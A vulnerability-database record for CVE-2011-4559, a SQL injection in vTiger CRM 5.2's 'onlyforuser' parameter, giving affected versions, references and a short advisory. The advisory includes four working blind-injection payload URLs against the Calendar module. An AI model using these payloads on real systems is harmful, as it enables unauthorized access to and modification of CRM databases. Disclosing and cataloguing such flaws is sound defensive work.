Details of VAR-E-201110-0032

ID

VAR-E-201110-0032

CVE

cve_id:

CVE-2011-4559

Trust: 1.9

sources: BID: 49948 // EXPLOIT-DB: 36208 // EDBNET: 57565

EDB ID

36208

TITLE

vTiger CRM 5.2 - 'onlyforuser' SQL Injection - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36208

DESCRIPTION

vTiger CRM 5.2 - 'onlyforuser' SQL Injection. CVE-2011-4559CVE-76138 . webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 36208

AFFECTED PRODUCTS

vendor:	vtiger	model:	crm	scope:	eq	version:	5.2	Trust: 1.3
vendor:	vtiger	model:	crm	scope:	eq	version:	5.2.1	Trust: 0.3

sources: BID: 49948 // EXPLOIT-DB: 36208

EXPLOIT

source: https://www.securityfocus.com/bid/49948/info

vtiger CRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

vtiger CRM 5.2.1 is vulnerable; prior versions may also be affected.

http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d1--

http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d2--

http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d5--

http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d4--

Trust: 1.0

sources: EXPLOIT-DB: 36208

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 36208

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36208

TYPE

'onlyforuser' SQL Injection

Trust: 1.0

sources: EXPLOIT-DB: 36208

CREDITS

Aung Khant

Trust: 0.6

sources: EXPLOIT-DB: 36208

EXTERNAL IDS

db:	NVD	id:	CVE-2011-4559	Trust: 1.9
db:	BID	id:	49948	Trust: 1.9
db:	EXPLOIT-DB	id:	36208	Trust: 1.6
db:	EDBNET	id:	57565	Trust: 0.6

sources: BID: 49948 // EXPLOIT-DB: 36208 // EDBNET: 57565

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2011-4559	Trust: 1.6
url:	https://www.securityfocus.com/bid/49948/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/36208/	Trust: 0.6
url:	https://secure.wikimedia.org/wikipedia/en/wiki/vtiger_crm	Trust: 0.3
url:	http://yehg.net/lab/pr0js/advisories/%5bvtiger_5.2.1%5d_blind_sqlin	Trust: 0.3
url:	http://www.vtiger.com/	Trust: 0.3

sources: BID: 49948 // EXPLOIT-DB: 36208 // EDBNET: 57565

SOURCES

db:	BID	id:	49948
db:	EXPLOIT-DB	id:	36208
db:	EDBNET	id:	57565

LAST UPDATE DATE

2022-07-27T09:40:42.444000+00:00

SOURCES UPDATE DATE

db:

BID

id:

49948

date:

2011-12-05T18:07:00

SOURCES RELEASE DATE

db:	BID	id:	49948	date:	2011-10-05T00:00:00
db:	EXPLOIT-DB	id:	36208	date:	2011-10-15T00:00:00
db:	EDBNET	id:	57565	date:	2011-10-15T00:00:00